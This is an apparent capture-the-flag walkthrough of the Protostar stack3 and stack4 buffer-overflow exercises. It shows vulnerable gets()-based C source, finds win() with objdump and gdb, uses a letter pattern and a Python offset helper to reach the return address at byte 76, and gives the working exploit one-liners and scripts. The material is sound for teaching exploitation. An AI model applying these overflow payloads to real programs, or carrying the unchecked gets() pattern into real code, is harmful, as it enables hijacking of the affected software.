Buffer Overflows can Redirect Program Execution - bin 0x0D

stack3

Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)

Hints: both gdb and objdump are your friends when you determine where the win() function lies in memory.

source code: 

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

open in objdump:

$ objdump -x stack3 | less

we can get the address of the win() function in memory from the symbol table.

open in gdb:

use gdb to determine the address of the win() function ('x' for 'examine', 'p' for 'print'):

pwned!:

$ python -c "print('A'*(4*16)+'\x24\x84\x04\x08')" | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

stack4

Stack4 takes a look at overwriting saved EIP and standard buffer overflows.

Hints:

  • a variety of introductory papers into buffer overflows may help.
  • gdb lets you do "run < input"
  • EIP is not directly after the end of buffer, compiler padding can also increase the size.

source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

open in objdump:

$ objdump -t /opt/protostar/bin/stack4 | grep win
080483f4 g     F .text	00000014              win

now we have the address of the win() function in memory: 0x080483f4

open in gdb:

try some input to see what happens:

$ vim /tmp/exploit.py

exploit.py: 

padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
print(padding)

write into a file:

$ python exploit.py > tmp
$ cat tmp
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

use the file as input in gdb (run < /tmp/tmp):

$ python -c "print(chr(0x54))"
T

have a look at the stack:

because the saved return address now reads 0x54545454, i.e. the bytes 'TTTT' from our pattern, we simply need to overwrite the 'TTTT' position (byte offset 76) with the address of the win() function.
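To make the 'TTTT' step mechanical, here is an added Python 3 example (not from the write-up) that rebuilds the letter pattern used above and maps the EIP value gdb reports back to a byte offset in the input; the function names and the layout dictionary are my own, and the 64-byte buffer size is taken from the stack4 source.

```python
import string
import struct


def alpha_pattern(length=104):
    # The write-up's pattern: each uppercase letter repeated 4 times,
    # AAAABBBB...ZZZZ (26 * 4 = 104 bytes), cut to `length`.
    pat = "".join(c * 4 for c in string.ascii_uppercase)
    return pat[:length]


def bytes_from_register(value):
    # gdb shows the overwritten EIP as a little-endian 32-bit integer;
    # unpack it back into the 4 bytes that sat on the stack, in memory order.
    return struct.pack("<I", value)


def offset_in_pattern(pattern, value):
    # Locate those 4 bytes in the pattern. With a repeated-letter pattern
    # only 4-byte-aligned, single-letter hits are unambiguous, so anything
    # else (garbage, or a partial overwrite) is reported as not found.
    needle = bytes_from_register(value).decode("latin-1")
    idx = pattern.find(needle)
    if idx < 0 or idx % 4 != 0 or len(set(needle)) != 1:
        return None
    return idx


def stack4_layout(ret_offset, buf_size=64):
    # Split the offset the way the write-up does: buffer, compiler padding,
    # 4 bytes of saved EBP, then the saved return address.
    ebp_offset = ret_offset - 4
    return {"buffer": buf_size,
            "compiler_padding": ebp_offset - buf_size,
            "saved_ebp": ebp_offset,
            "saved_eip": ret_offset}


if __name__ == "__main__":
    pat = alpha_pattern()
    off = offset_in_pattern(pat, 0x54545454)   # gdb reported EIP = 'TTTT'
    print("return address at offset", off)     # 76
    print(stack4_layout(off))
```

With the page's crash value the offset comes out as 76, which is the 72 bytes of padding plus the 4-byte saved EBP that the final exploit.py uses.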

now we modify the exploit.py:

import struct
# Python 2: struct.pack returns a str, so it concatenates with the padding
padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"  # 72 bytes up to saved EBP
ebp="AAAA"  # 4 bytes of saved EBP
# a better way to convert the integer into a little-endian binary string
ret=struct.pack("<I", 0x080483f4)  # address of win()
print(padding+ebp+ret)

let's try it out:

$ python exploit.py > tmp

pwned!
